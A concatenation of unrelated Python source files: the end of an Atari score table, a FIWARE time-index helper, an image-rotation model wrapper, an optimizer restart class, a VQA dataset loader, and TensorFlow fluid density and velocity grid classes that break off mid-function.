'score': 17322,
},
{
'env-title': 'atari-road-runner',
'env-variant': 'No-op start',
'score': 55839,
},
{
'env-title': 'atari-robotank',
'env-variant': 'No-op start',
'score': 52.3,
},
{
'env-title': 'atari-seaquest',
'env-variant': 'No-op start',
'score': 266434,
},
{
'env-title': 'atari-skiing',
'env-variant': 'No-op start',
'score': -13901,
},
{
'env-title': 'atari-solaris',
'env-variant': 'No-op start',
'score': 8342,
},
{
'env-title': 'atari-space-invaders',
'env-variant': 'No-op start',
'score': 5747,
},
{
'env-title': 'atari-star-gunner',
'env-variant': 'No-op start',
'score': 49095,
},
{
'env-title': 'atari-surround',
'env-variant': 'No-op start',
'score': 6.8,
},
{
'env-title': 'atari-tennis',
'env-variant': 'No-op start',
'score': 23.1,
},
{
'env-title': 'atari-time-pilot',
'env-variant': 'No-op start',
'score': 8329,
},
{
'env-title': 'atari-tutankham',
'env-variant': 'No-op start',
'score': 280,
},
{
'env-title': 'atari-up-n-down',
'env-variant': 'No-op start',
'score': 15612,
},
{
'env-title': 'atari-venture',
'env-variant': 'No-op start',
'score': 1520,
},
{
'env-title': 'atari-video-pinball',
'env-variant': 'No-op start',
'score': 949604,
},
{
'env-title': 'atari-wizard-of-wor',
'env-variant': 'No-op start',
'score': 9300,
},
{
'env-title': 'atari-yars-revenge',
'env-variant': 'No-op start',
'score': 35050,
},
{
'env-title': 'atari-zaxxon',
'env-variant': 'No-op start',
'score': 10513,
},
]
|
144364
|
from datetime import datetime
from typing import Iterable, Union
from utils.common import iter_entity_attrs
from utils.jsondict import maybe_value, maybe_string_match
from utils.timestr import latest_from_str_rep, to_datetime
TIME_INDEX_HEADER_NAME = 'Fiware-TimeIndex-Attribute'
MaybeString = Union[str, None]
def _first_not_none(xs: Iterable):
ys = [x for x in xs if x is not None]
return ys[0]
# NB this function is always called with a sequence containing at least one
# value != None.
def _attribute(notification: dict, attr_name: str) -> MaybeString:
return maybe_value(notification, attr_name, 'value')
def _attribute_key_values(notification: dict, attr_name: str) -> MaybeString:
return maybe_value(notification, attr_name)
def _meta_attribute(notification: dict, attr_name: str, meta_name: str) \
-> MaybeString:
return maybe_value(notification,
attr_name, 'metadata', meta_name, 'value')
def _json_ld_meta_attribute(
notification: dict,
attr_name: str,
meta_name: str) -> MaybeString:
return maybe_value(notification,
attr_name, meta_name)
def _iter_metadata(
notification: dict,
meta_name: str) -> Iterable[MaybeString]:
for attr_name in iter_entity_attrs(notification):
yield _meta_attribute(notification, attr_name, meta_name)
def _iter_json_ld_metadata(
notification: dict,
meta_name: str) -> Iterable[MaybeString]:
for attr_name in iter_entity_attrs(notification):
yield _json_ld_meta_attribute(notification, attr_name, meta_name)
def time_index_priority_list(
custom_index: str,
notification: dict) -> datetime:
"""
Returns the next possible time_index value using the strategy described in
the function select_time_index_value.
"""
# Custom time index attribute
yield to_datetime(_attribute(notification, custom_index))
# The most recent custom time index metadata
yield latest_from_str_rep(_iter_metadata(notification, custom_index))
# TimeInstant attribute
yield to_datetime(_attribute(notification, "TimeInstant"))
# The most recent TimeInstant metadata
yield latest_from_str_rep(_iter_metadata(notification, "TimeInstant"))
# timestamp attribute
yield to_datetime(_attribute(notification, "timestamp"))
# The most recent timestamp metadata
yield latest_from_str_rep(_iter_metadata(notification, "timestamp"))
# The most recent observedAt json-ld metadata
yield latest_from_str_rep(_iter_json_ld_metadata(notification, "observedAt"))
# The most recent modifiedAt json-ld metadata
yield latest_from_str_rep(_iter_json_ld_metadata(notification, "modifiedAt"))
# observedAt attribute
yield to_datetime(_attribute_key_values(notification, "observedAt"))
# modifiedAt attribute
yield to_datetime(_attribute_key_values(notification, "modifiedAt"))
# dateModified attribute
yield to_datetime(_attribute(notification, "dateModified"))
# The most recent dateModified metadata
yield latest_from_str_rep(_iter_metadata(notification, "dateModified"))
def select_time_index_value(custom_index: str, notification: dict) -> datetime:
"""
Determine which attribute or metadata value to use as a time index for the
entity being notified.
The returned value will be the first value found in the below list that can
be converted to a ``datetime``. Items are considered from top to bottom,
so that if multiple values are present and they can all be converted to
``datetime``, the topmost value is chosen.
- Custom time index. The value of the ``TIME_INDEX_HEADER_NAME``. Note
that for a notification to contain such header, the corresponding
subscription has to be created with an ``httpCustom`` block as detailed
in the *Subscriptions* and *Custom Notifications* sections of the NGSI
spec.
- Custom time index metadata. The most recent custom time index attribute
value found in any of the attribute metadata sections in the notification
- ``TimeInstant`` attribute.
- ``TimeInstant`` metadata. The most recent ``TimeInstant`` attribute value
found in any of the attribute metadata sections in the notification.
- ``timestamp`` attribute.
- ``timestamp`` metadata. The most recent ``timestamp`` attribute value
found in any of the attribute metadata sections in the notification.
    - ``observedAt`` JSON-LD metadata. The most recent ``observedAt`` value
      found in any of the attribute metadata sections in the notification.
    - ``modifiedAt`` JSON-LD metadata. The most recent ``modifiedAt`` value
      found in any of the attribute metadata sections in the notification.
    - ``observedAt`` attribute.
    - ``modifiedAt`` attribute.
    - ``dateModified`` attribute.
    - ``dateModified`` metadata. The most recent ``dateModified`` attribute
      value found in any of the attribute metadata sections in the notification.
- Current time. This is the default value we use if any of the above isn't
present or none of the values found can actually be converted to a
``datetime``.
:param custom_index: name of the custom_index (if requested,
None otherwise)
:param notification: the notification JSON payload as received from Orion.
:return: the value to be used as time index.
"""
current_time = datetime.now()
for index_candidate in time_index_priority_list(
custom_index, notification):
if index_candidate:
return index_candidate
# use the current time as a last resort
return current_time
def select_time_index_value_as_iso(custom_index: str, notification: dict) -> \
str:
"""
Same as ``select_time_index_value`` but formats the returned ``datetime``
as an ISO 8601 string.
"""
return select_time_index_value(custom_index, notification).isoformat()
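# --- Usage sketch (not part of the original module) ----------------------------
# The entity payload below is a made-up NGSI notification carrying a
# ``TimeInstant`` attribute; its value should win over the current-time fallback.
if __name__ == "__main__":
    sample_entity = {
        "id": "Room1",
        "type": "Room",
        "TimeInstant": {"type": "DateTime", "value": "2021-06-01T12:00:00.000Z"},
        "temperature": {"type": "Number", "value": 21.5},
    }
    print(select_time_index_value_as_iso(None, sample_entity))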
|
144373
|
import numpy as np
from wrappa import WrappaObject, WrappaImage
class DSModel:
def __init__(self, **kwargs):
pass
def predict(self, data, **kwargs):
_ = kwargs
# Data is always an array of WrappaObjects
responses = []
for obj in data:
img = obj.image.as_ndarray
rotated_img = np.rot90(img)
resp = WrappaObject(WrappaImage.init_from_ndarray(
payload=rotated_img,
ext=obj.image.ext,
))
responses.append(resp)
return responses
def predict_180(self, data, **kwargs):
_ = kwargs
# Data is always an array of WrappaObjects
responses = []
for obj in data:
img = obj.image.as_ndarray
rotated_img = np.rot90(img)
rotated_img = np.rot90(rotated_img)
resp = WrappaObject(WrappaImage.init_from_ndarray(
payload=rotated_img,
ext=obj.image.ext,
))
responses.append(resp)
return responses
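# --- Usage sketch (not part of the original module) ----------------------------
# Rotate a random RGB image once by 90 degrees. This assumes, as predict() above
# does, that a WrappaObject built from a WrappaImage exposes it as ``.image``.
if __name__ == "__main__":
    dummy = np.random.randint(0, 255, size=(32, 32, 3), dtype=np.uint8)
    request = WrappaObject(WrappaImage.init_from_ndarray(payload=dummy, ext="png"))
    [response] = DSModel().predict([request])
    print(response.image.as_ndarray.shape)  # (32, 32, 3)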
|
144376
|
import chex
from .restarter import RestartWrapper
from .termination import spread_criterion
class Simple_Restarter(RestartWrapper):
def __init__(
self,
base_strategy,
stop_criteria=[spread_criterion],
):
"""Simple Restart Strategy - Only reinitialize the state."""
super().__init__(base_strategy, stop_criteria)
@property
def restart_params(self) -> chex.ArrayTree:
"""Return default parameters for strategy restarting."""
re_params = {"min_num_gens": 50, "min_fitness_spread": 0.1}
return re_params
def restart_strategy(
self,
rng: chex.PRNGKey,
state: chex.ArrayTree,
params: chex.ArrayTree,
) -> chex.ArrayTree:
"""Simple restart by state initialization."""
new_state = self.base_strategy.initialize(rng, params)
return new_state
|
144389
|
from pytasking.wrappers import *
from pytasking.utilities import *
from pytasking.manager import *
name = "pytasking"
|
144402
|
import torch.utils.data as data
import os,sys
import numpy as np
import pickle
sys.path.insert(0, '../')
def default_loader(path):
return pickle.load(open(path, 'rb'))
def parse_data(data, cur_num_boxes, w, h, num_boxes):
features, boxes, attn_target, use, objs, atts, att_use = [], [], [], [], [], [], []
for i in range(cur_num_boxes):
cb, cf, co, ca = data['boxes'][i], data['features'][i], [], []
features.append(np.asarray(cf))
boxes.append(np.asarray([cb[0]*1.0/w, cb[1]*1.0/h, cb[2]*1.0/w, cb[3]*1.0/h, ((cb[2]-cb[0])*(cb[3]-cb[1])*1.0)/(w*h)]))
pad_len = num_boxes - cur_num_boxes
for i in range(pad_len):
features.append(np.asarray([0.0]*2048))
boxes.append(np.asarray([0.0]*5))
return features, boxes
class MSCOCOvqa(data.Dataset):
def __init__(self, data, path, w2i, num_boxes=36, q_len=14, loader=default_loader):
self.data = data
self.path = path
self.loader = loader
self.max_len = q_len
self.a_vocab_size = len(w2i[0])
self.q_vocab_size = len(w2i[1])
self.num_boxes = num_boxes
def __getitem__(self, index):
cur_data = self.data[index]
img_id = cur_data['image_id']
question = cur_data['question'][:self.max_len]
question_id = -1
        if 'question_id' in cur_data:
question_id = cur_data['question_id']
pad_len = max(0, self.max_len-len(question))
question = question + [self.q_vocab_size]*pad_len
answers = cur_data['answers']
data_path = os.path.join(self.path, str(img_id)+'.pkl')
try:
data = self.loader(data_path)
except:
print('error in loading pkl from ' + str(data_path))
exit(-1)
cur_num_boxes = data['num_boxes']
w = data['image_w']
h = data['image_h']
features, boxes = parse_data(data, cur_num_boxes, w, h, self.num_boxes)
label = np.zeros(self.a_vocab_size)
for ans in answers:
w, c = ans
label[w] = float(c)
return np.asarray(features, dtype=np.float32), np.asarray(boxes, dtype=np.float32), np.asarray(question), \
label, question_id, data_path
def __len__(self):
return len(self.data)
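# --- Usage sketch (not part of the original module) ----------------------------
# Hypothetical helper showing how the dataset is typically consumed: wrap it in a
# standard PyTorch DataLoader. `entries`, `feature_dir` and `w2i` stand in for the
# real preprocessed question data, feature directory and (answer, question) vocabularies.
def build_vqa_loader(entries, feature_dir, w2i, batch_size=32):
    dataset = MSCOCOvqa(entries, feature_dir, w2i)
    return data.DataLoader(dataset, batch_size=batch_size, shuffle=True, num_workers=4)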
|
144416
|
import copy, os
import tensorflow as tf
import numpy as np
from lib.tf_ops import shape_list, spacial_shape_list, tf_tensor_stats, tf_norm2, tf_angle_between
from lib.util import load_numpy
from .renderer import Renderer
from .transform import GridTransform
from .vector import GridShape, Vector3
import logging
LOG = logging.getLogger("Structs")
# --- DATA Structs ---
def get_coord_field(shape, offset=[0,0,0], lod=0.0, concat=True):
'''
shape: z,y,x
offset: x,y,z
    returns: 1,z,y,x,c with c=x,y,z,lod
'''
coord_z, coord_y, coord_x = tf.meshgrid(tf.range(shape[0], dtype=tf.float32), tf.range(shape[1], dtype=tf.float32), tf.range(shape[2], dtype=tf.float32), indexing='ij') #z,y,x
coord_data = [tf.reshape(coord_x + offset[0], [1]+shape+[1]),
tf.reshape(coord_y + offset[1], [1]+shape+[1]),
tf.reshape(coord_z + offset[2], [1]+shape+[1])] #3 x 1DHW1
if lod is not None:
lod_data = tf.constant(lod, shape=[1]+shape+[1], dtype=tf.float32) #tf.ones([1]+shape+[1])*lod
coord_data.append(lod_data)#4 x 1DHW1
if concat:
coord_data = tf.concat(coord_data, axis=-1)
return coord_data
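# --- Usage sketch (not part of the original module) ----------------------------
# For a 4x8x8 (z,y,x) grid the returned tensor has shape [1,4,8,8,4], the last
# axis holding (x, y, z, lod).
def _coord_field_example():
    field = get_coord_field([4, 8, 8])
    return shape_list(field)  # [1, 4, 8, 8, 4]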
class Zeroset:
def __init__(self, initial_value, shape=None, as_var=True, outer_bounds="OPEN", device=None, var_name="zeroset", trainable=True):
self.outer_bounds = outer_bounds
self.is_var = as_var
self._device = device
self._name = var_name
self._is_trainable = trainable
with tf.device(self._device):
if shape is not None:
assert isinstance(shape, GridShape)
initial_value = tf.constant(initial_value, shape=shape.value, dtype=tf.float32)
if as_var:
self._levelset = tf.Variable(initial_value=initial_value, name=var_name, trainable=trainable)
else:
self._levelset = tf.identity(initial_value)
@property
def grid_shape(self):
return GridShape.from_tensor(self._levelset)
def _hull_staggered_lerp_weight(self, a, b):
a_leq = tf.less_equal(a,0)
return tf.where( tf.logical_xor(a_leq, tf.less_equal(b,0)), #sign change along iterpolation
tf.abs( tf.divide( tf.minimum(a,b), tf.subtract(a,b) ) ),
tf.cast(a_leq, dtype=a.dtype)
)
def _hull_simple_staggered_component(self, axis):
assert axis in [1,2,3,-2,-3,-4]
axis = axis%5
pad = [(0,0),(0,0),(0,0),(0,0),(0,0)]
pad[axis]=(1,1)
shape = self.grid_shape.value
shape[axis] -= 1
offset = np.zeros((5,), dtype=np.int32)
cells_prev = tf.slice(self._levelset, offset, shape) #self._levelset[:,:,:,:-1,:]
offset[axis] += 1
cells_next = tf.slice(self._levelset, offset, shape) #self._levelset[:,:,:, 1:,:]
hull = self._hull_staggered_lerp_weight(cells_prev,cells_next)
hull = tf.pad(hull, pad, constant_values=1 if self.outer_bounds=="OPEN" else 0)
return hull
def to_hull_simple_staggered(self):
return self._hull_simple_staggered_component(-2), self._hull_simple_staggered_component(-3), self._hull_simple_staggered_component(-4)
def to_hull_simple_centered(self):
raise NotImplementedError()
def to_denstiy_simple_centered(self):
return tf.where(tf.greater(self._levelset, 0), 250, 0)
def resize(self, shape):
assert shape_list(shape)==[3]
new_shape = GridShape(shape)
if new_shape==self.grid_shape:
return
raise NotImplementedError("Zeroset.resize() not implemented.")
    def assign(self, levelset):
raise NotImplementedError()
class DensityGrid:
    def __init__(self, shape, constant=0.1, as_var=True, d=None, scale_renderer=None, hull=None, inflow=None, inflow_offset=None, inflow_mask=None, device=None, var_name="density", trainable=True, restrict_to_hull=True):
self.shape = shape
if d is not None:
d_shape = shape_list(d)
if not len(d_shape)==5 or not d_shape[-1]==1 or not self.shape==spacial_shape_list(d):
raise ValueError("Invalid shape of density on assignment: %s"%d_shape)
self.is_var = as_var
self._device = device
self._name = var_name
self._is_trainable = trainable
if as_var:
rand_init = tf.constant_initializer(constant)
with tf.device(self._device):
self._d = tf.Variable(initial_value=d if d is not None else rand_init(shape=[1]+self.shape+[1], dtype=tf.float32), name=var_name+'_dens', trainable=True)
else:
with tf.device(self._device):
if d is not None:
self._d = tf.constant(d, dtype=tf.float32)
else:
self._d = tf.constant(constant, shape=[1]+self.shape+[1], dtype=tf.float32)
self.scale_renderer = scale_renderer
with tf.device(self._device):
self.hull = tf.constant(hull, dtype=tf.float32) if hull is not None else None
self.restrict_to_hull = restrict_to_hull
if inflow is not None:
with tf.device(self._device):
if isinstance(inflow, str) and inflow=='CONST':
assert isinstance(inflow_mask, (tf.Tensor, np.ndarray))
                    inflow = tf.constant(constant, shape=shape_list(inflow_mask), dtype=tf.float32) # constant init; avoids rand_init, which only exists in the as_var branch
if as_var:
self._inflow = tf.Variable(initial_value=inflow, name=var_name+'_inflow', trainable=True)
else:
self._inflow = tf.constant(inflow, dtype=tf.float32)
self.inflow_mask = tf.constant(inflow_mask, dtype=tf.float32) if inflow_mask is not None else None
inflow_shape = spacial_shape_list(self._inflow) #.get_shape().as_list()[-4:-1]
self._inflow_padding = [[0,0]]+[[inflow_offset[_],self.shape[_]-inflow_offset[_]-inflow_shape[_]] for _ in range(3)]+[[0,0]]
self.inflow_offset = inflow_offset
else:
self._inflow = None
@property
def trainable(self):
return self._is_trainable and self.is_var
@property
def d(self):
if self.restrict_to_hull:
return self.with_hull()
else:
return tf.identity(self._d)
def with_hull(self):
if self.hull is not None:
return self._d * self.hull # hull is a (smooth) binary mask
else:
return tf.identity(self._d)
@property
def inflow(self):
if self._inflow is None:
return tf.zeros_like(self._d, dtype=tf.float32)
elif self.inflow_mask is not None: #hasattr(self, 'inflow_mask') and
return tf.pad(self._inflow*self.inflow_mask, self._inflow_padding)
else:
return tf.pad(self._inflow, self._inflow_padding)
def with_inflow(self):
density = self.d
if self._inflow is not None:
density = tf.maximum(density+self.inflow, 0)
return density
@classmethod
    def from_file(cls, path, as_var=True, scale_renderer=None, hull=None, inflow=None, inflow_offset=None, inflow_mask=None, device=None, var_name="density", trainable=True, restrict_to_hull=True):
try:
with np.load(path) as np_data:
d = np_data['arr_0']
shape =spacial_shape_list(d)
if 'hull' in np_data and hull is None:
hull = np_data['hull']
if 'inflow' in np_data and inflow is None:
inflow=np_data['inflow']
if 'inflow_mask' in np_data and inflow_mask is None:
inflow_mask=np_data['inflow_mask']
if 'inflow_offset' in np_data and inflow_offset is None:
inflow_offset=np_data['inflow_offset'].tolist()
grid = cls(shape, d=d, as_var=as_var, scale_renderer=scale_renderer, hull=hull, inflow=inflow, inflow_offset=inflow_offset, inflow_mask=inflow_mask, \
device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
except:
LOG.warning("Failed to load density from '%s':", path, exc_info=True)
return None
else:
return grid
@classmethod
    def from_scalarFlow_file(cls, path, as_var=True, shape=None, scale_renderer=None, hull=None, inflow=None, inflow_offset=None, inflow_mask=None, device=None, var_name="sF_density", trainable=True, restrict_to_hull=True):
# if shape is set the loaded grid will be reshaped if necessary
density = load_numpy(path).astype(np.float32)[::-1]
density = density.reshape([1] + list(density.shape)) #
density = tf.constant(density, dtype=tf.float32)
d_shape = spacial_shape_list(density)
if shape is not None and shape!=d_shape:
if scale_renderer is None:
raise ValueError("No renderer provided to scale density.")
LOG.debug("scaling scalarFlow density from %s to %s", d_shape, shape)
density = scale_renderer.resample_grid3D_aligned(density, shape)
d_shape = shape
else:
            # cut off the SF inflow region and set it as inflow. Or is it already cut off in the SF dataset? It is, but not in the synth dataset or my own sF runs.
# lower 15 cells...
inflow, density= tf.split(density, [15, d_shape[1]-15], axis=-3)
inflow_mask = tf.ones_like(inflow, dtype=tf.float32)
inflow_offset = [0,0,0]
density = tf.concat([tf.zeros_like(inflow, dtype=tf.float32), density], axis=-3)
return cls(d_shape, d=density, as_var=as_var, scale_renderer=scale_renderer, hull=hull, inflow=inflow, inflow_offset=inflow_offset, inflow_mask=inflow_mask, \
device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
def copy(self, as_var=None, device=None, var_name=None, trainable=None, restrict_to_hull=None):
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_cpy'
if trainable is None:
trainable = self._is_trainable
if restrict_to_hull is None:
restrict_to_hull = self.restrict_to_hull
if self._inflow is not None:
grid = DensityGrid(self.shape, d=tf.identity(self._d), as_var=as_var, scale_renderer=self.scale_renderer, hull=self.hull, \
inflow=tf.identity(self._inflow), inflow_offset=self.inflow_offset, inflow_mask=self.inflow_mask, \
device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
else:
grid = DensityGrid(self.shape, d=tf.identity(self._d), as_var=as_var, scale_renderer=self.scale_renderer, hull=self.hull, \
device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
return grid
def scaled(self, new_shape, with_inflow=False):
if not (isinstance(new_shape, list) and len(new_shape)==3):
raise ValueError("Invalid shape")
density = self.d if not with_inflow else self.with_inflow()
if new_shape!=self.shape:
LOG.debug("Scaling density from %s to %s", self.shape, new_shape)
with self.scale_renderer.profiler.sample("scale density"):
d_scaled = self.scale_renderer.resample_grid3D_aligned(density, new_shape)
else:
LOG.debug("No need to scale density to same shape %s", self.shape)
d_scaled = tf.identity(density)
return d_scaled
def copy_scaled(self, new_shape, as_var=None, device=None, var_name=None, trainable=None, restrict_to_hull=None):
'''Does not copy inflow and hull, TODO'''
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_scaled'
if trainable is None:
trainable = self._is_trainable
if restrict_to_hull is None:
restrict_to_hull = self.restrict_to_hull
d_scaled = self.scaled(new_shape)
grid = DensityGrid(new_shape, d=d_scaled, as_var=as_var, scale_renderer=self.scale_renderer, device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
return grid
def warped(self, vel_grid, order=1, dt=1.0, clamp="NONE"):
if not (isinstance(vel_grid, VelocityGrid)):
raise ValueError("Invalid velocity grid")
return vel_grid.warp(self.with_inflow(), order=order, dt=dt, clamp=clamp)
def copy_warped(self, vel_grid, as_var=None, order=1, dt=1.0, device=None, var_name=None, clamp="NONE", trainable=None, restrict_to_hull=None):
'''Does not copy inflow and hull, TODO'''
if as_var is None:
as_var = self.is_var
if as_var and var_name is None:
var_name = self._name + '_warped'
if trainable is None:
trainable = self._is_trainable
if restrict_to_hull is None:
restrict_to_hull = self.restrict_to_hull
d_warped = self.warped(vel_grid, order=order, dt=dt, clamp=clamp)
grid = DensityGrid(self.shape, d=d_warped, as_var=as_var, scale_renderer=self.scale_renderer, device=device, var_name=var_name, trainable=trainable, restrict_to_hull=restrict_to_hull)
return grid
def scale(self, scale):
self.assign(self._d*scale)
def apply_clamp(self, vmin, vmax):
vmin = tf.maximum(vmin, 0)
d = tf.clip_by_value(self._d, vmin, vmax)
inflow = None
if self._inflow is not None:
# use already clamped density for consistency
            density_shape = shape_list(d)
            density_cropped = d[self._inflow_padding[0][0] : density_shape[0]-self._inflow_padding[0][1],
                self._inflow_padding[1][0] : density_shape[1]-self._inflow_padding[1][1],
                self._inflow_padding[2][0] : density_shape[2]-self._inflow_padding[2][1],
                self._inflow_padding[3][0] : density_shape[3]-self._inflow_padding[3][1],
                self._inflow_padding[4][0] : density_shape[4]-self._inflow_padding[4][1]]
inflow = tf.clip_by_value(self._inflow, vmin - density_cropped, vmax - density_cropped)
self.assign(d, inflow)
def assign(self, d, inflow=None):
shape = shape_list(d)
if not len(shape)==5 or not shape[-1]==1 or not shape[-4:-1]==self.shape:
raise ValueError("Invalid or incompatible shape of density on assignment: is {}, required: NDHW1 with DHW={}".format(shape, self.shape))
if self.is_var:
self._d.assign(d)
if self._inflow is not None and inflow is not None:
self._inflow.assign(inflow)
else:
with tf.device(self._device):
self._d = tf.identity(d)
if self._inflow is not None and inflow is not None:
self._inflow = tf.identity(inflow)
def var_list(self):
if self.is_var:
if self._inflow is not None:
return [self._d, self._inflow]
return [self._d]
else:
raise TypeError("This DensityGrid is not a variable.")
def get_variables(self):
if self.is_var:
var_dict = {'density': self._d}
if self._inflow is not None:
var_dict['inflow'] = self._inflow
return var_dict
else:
raise TypeError("This DensityGrid is not a variable.")
def save(self, path):
density = self._d
if isinstance(density, (tf.Tensor, tf.Variable)):
density = density.numpy()
save = {}
if self.hull is not None:
hull = self.hull
if isinstance(hull, (tf.Tensor, tf.Variable)):
hull = hull.numpy()
save['hull']=hull
if self._inflow is not None:
inflow = self._inflow
if isinstance(inflow, (tf.Tensor, tf.Variable)):
inflow = inflow.numpy()
save['inflow']=inflow
if self.inflow_mask is not None:
inflow_mask = self.inflow_mask
if isinstance(inflow_mask, (tf.Tensor, tf.Variable)):
inflow_mask = inflow_mask.numpy()
save['inflow_mask']=inflow_mask
save['inflow_offset']=np.asarray(self.inflow_offset)
np.savez_compressed(path, density, **save)
def mean(self):
return tf.reduce_mean(self.d)
def stats(self, mask=None, state=None, **warp_kwargs):
'''
mask: optional binary float mask, stats only consider cells>0.5
'''
d = self.d
if mask is not None:
mask = mask if mask.dtype==tf.bool else tf.greater(mask, 0.5)
d = tf.boolean_mask(d, mask)
stats = {
'density': tf_tensor_stats(d, as_dict=True),
'shape':self.shape,
}
if state is not None and state.prev is not None and state.prev.density is not None and state.prev.velocity is not None:
warp_SE = tf.squared_difference(state.prev.density_advected(**warp_kwargs), self.d)
if mask is not None:
warp_SE = tf.boolean_mask(warp_SE, mask)
stats["warp_SE"] = tf_tensor_stats(warp_SE, as_dict=True)
else:
stats["warp_SE"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
return stats
class VelocityGrid:
@staticmethod
def component_shapes(centered_shape):
x_shape = copy.copy(centered_shape)
x_shape[2] +=1
y_shape = copy.copy(centered_shape)
y_shape[1] +=1
z_shape = copy.copy(centered_shape)
z_shape[0] +=1
return x_shape, y_shape, z_shape
def __init__(self, centered_shape, std=0.1, as_var=True, x=None, y=None, z=None, boundary=None, scale_renderer=None, warp_renderer=None, *, coords=None, lod=None, device=None, var_name="velocity", trainable=True):
self.centered_shape = centered_shape.tolist() if isinstance(centered_shape, np.ndarray) else centered_shape
self.x_shape, self.y_shape, self.z_shape = VelocityGrid.component_shapes(self.centered_shape)
self.set_boundary(boundary)
self.is_var = as_var
self._device = device
self._name = var_name
self._is_trainable = trainable
if as_var:
if x is not None:
x_shape = shape_list(x)
if not len(x_shape)==5 or not x_shape[-1]==1 or not x_shape[-4:-1]==self.x_shape:
raise ValueError("Invalid shape of velocity x component on assignment")
if y is not None:
y_shape = shape_list(y)
if not len(y_shape)==5 or not y_shape[-1]==1 or not y_shape[-4:-1]==self.y_shape:
raise ValueError("Invalid shape of velocity y component on assignment")
if z is not None:
z_shape = shape_list(z)
if not len(z_shape)==5 or not z_shape[-1]==1 or not z_shape[-4:-1]==self.z_shape:
raise ValueError("Invalid shape of velocity z component on assignment")
# in a box
#rand_init = tf.random_normal_initializer(0.0, std)
std = tf.abs(std)
rand_init = tf.random_uniform_initializer(-std, std)
# maybe even uniformly in space and in a sphere?: http://6degreesoffreedom.co/circle-random-sampling/
with tf.device(self._device):
self._x = tf.Variable(initial_value=x if x is not None else rand_init(shape=[1]+self.x_shape+[1], dtype=tf.float32), name=var_name + '_x', trainable=True)
self._y = tf.Variable(initial_value=y if y is not None else rand_init(shape=[1]+self.y_shape+[1], dtype=tf.float32), name=var_name + '_y', trainable=True)
self._z = tf.Variable(initial_value=z if z is not None else rand_init(shape=[1]+self.z_shape+[1], dtype=tf.float32), name=var_name + '_z', trainable=True)
else:
if x is None:
x = tf.constant(tf.random.uniform([1]+self.x_shape+[1], -std, std, dtype=tf.float32))
if y is None:
y = tf.constant(tf.random.uniform([1]+self.y_shape+[1], -std, std, dtype=tf.float32))
if z is None:
z = tf.constant(tf.random.uniform([1]+self.z_shape+[1], -std, std, dtype=tf.float32))
self.assign(x,y,z)
if lod is None:
lod = tf.zeros([1]+self.centered_shape+[1])
with tf.device(self._device):
self.lod_pad = tf.identity(lod)
self.scale_renderer = scale_renderer
if self.scale_renderer is not None:
if (self.outer_bounds=='CLOSED' and self.scale_renderer.boundary_mode!='BORDER') \
or (self.outer_bounds=='OPEN' and self.scale_renderer.boundary_mode!='CLAMP'):
LOG.warning("Velocity outer boundary %s does not match scale renderer boundary mode %s", self.outer_bounds, self.scale_renderer.boundary_mode)
self.warp_renderer = warp_renderer
if self.warp_renderer is not None:
if (self.outer_bounds=='CLOSED' and self.warp_renderer.boundary_mode!='BORDER') \
or (self.outer_bounds=='OPEN' and self.warp_renderer.boundary_mode!='CLAMP'):
LOG.warning("Velocity outer boundary %s does not match scale renderer boundary mode %s", self.outer_bounds, self.warp_renderer.boundary_mode)
def set_boundary(self, boundary):
assert (boundary is None) or isinstance(boundary, Zeroset)
self.boundary = boundary
self.outer_bounds = self.boundary.outer_bounds if self.boundary is not None else "OPEN"
@property
def trainable(self):
return self._is_trainable and self.is_var
@property
def x(self):
v = self._x
if self.boundary is not None:
v*= self.boundary._hull_simple_staggered_component(-2)
return v
@property
def y(self):
v = self._y
if self.boundary is not None:
v*= self.boundary._hull_simple_staggered_component(-3)
return v
@property
def z(self):
v = self._z
if self.boundary is not None:
v*= self.boundary._hull_simple_staggered_component(-4)
return v
@classmethod
def from_centered(cls, centered_grid, as_var=True, boundary=None, scale_renderer=None, warp_renderer=None, device=None, var_name="velocity", trainable=True):
centered_shape = shape_list(centered_grid)
assert len(centered_shape)==5
assert centered_shape[-1]==3
assert centered_shape[0]==1
centered_shape = centered_shape[-4:-1]
vel_grid = cls(centered_shape, as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name=var_name, trainable=trainable)
x,y,z = vel_grid._centered_to_staggered(centered_grid)
vel_grid.assign(x,y,z)
return vel_grid
@classmethod
def from_file(cls, path, as_var=True, boundary=None, scale_renderer=None, warp_renderer=None, device=None, var_name="velocity", trainable=True):
try:
with np.load(path) as vel:
if 'centered_shape' not in vel:#legacy
shape = shape_list(vel["vel_x"])
LOG.debug("%s", shape)
shape[-2] -=1
shape = shape[1:-1]
else:
shape = vel['centered_shape'].tolist()
vel_grid = cls(shape, x=vel["vel_x"].astype(np.float32), y=vel["vel_y"].astype(np.float32), z=vel["vel_z"].astype(np.float32), \
as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device, var_name=var_name, trainable=trainable)
except:
LOG.warning("Failed to load velocity from '%s':", path, exc_info=True)
return None
else:
return vel_grid
@classmethod
def from_scalarFlow_file(cls, path, as_var=True, shape=None, boundary=None, scale_renderer=None, warp_renderer=None, device=None, var_name="sF_velocity", trainable=True):
# sF velocities are stored as combined staggered grid with upper cells missing, DHWC with C=3
velocity = load_numpy(path).astype(np.float32)[::-1]
v_shape = GridShape.from_tensor(velocity)
velocity = v_shape.normalize_tensor_shape(velocity) #.reshape([1] + list(velocity.shape)) # NDHWC
velocity = tf.constant(velocity, dtype=tf.float32)
v_shape = v_shape.zyx.value
v_x, v_y, v_z = tf.split(velocity, 3, axis=-1)
p0 = (0,0)
# extend missing upper cell
v_x = tf.pad(v_x, [p0,p0,p0,(0,1),p0], "SYMMETRIC")
v_y = tf.pad(v_y, [p0,p0,(0,1),p0,p0], "SYMMETRIC")
v_z = tf.pad(-v_z, [p0,(1,0),p0,p0,p0], "SYMMETRIC") #z value/direction reversed, pad lower value as axis is reversed (?)
#v_shape = spacial_shape_list(velocity)
if shape is not None and v_shape!=shape:
assert len(shape)==3
if scale_renderer is None:
raise ValueError("No renderer provided to scale velocity.")
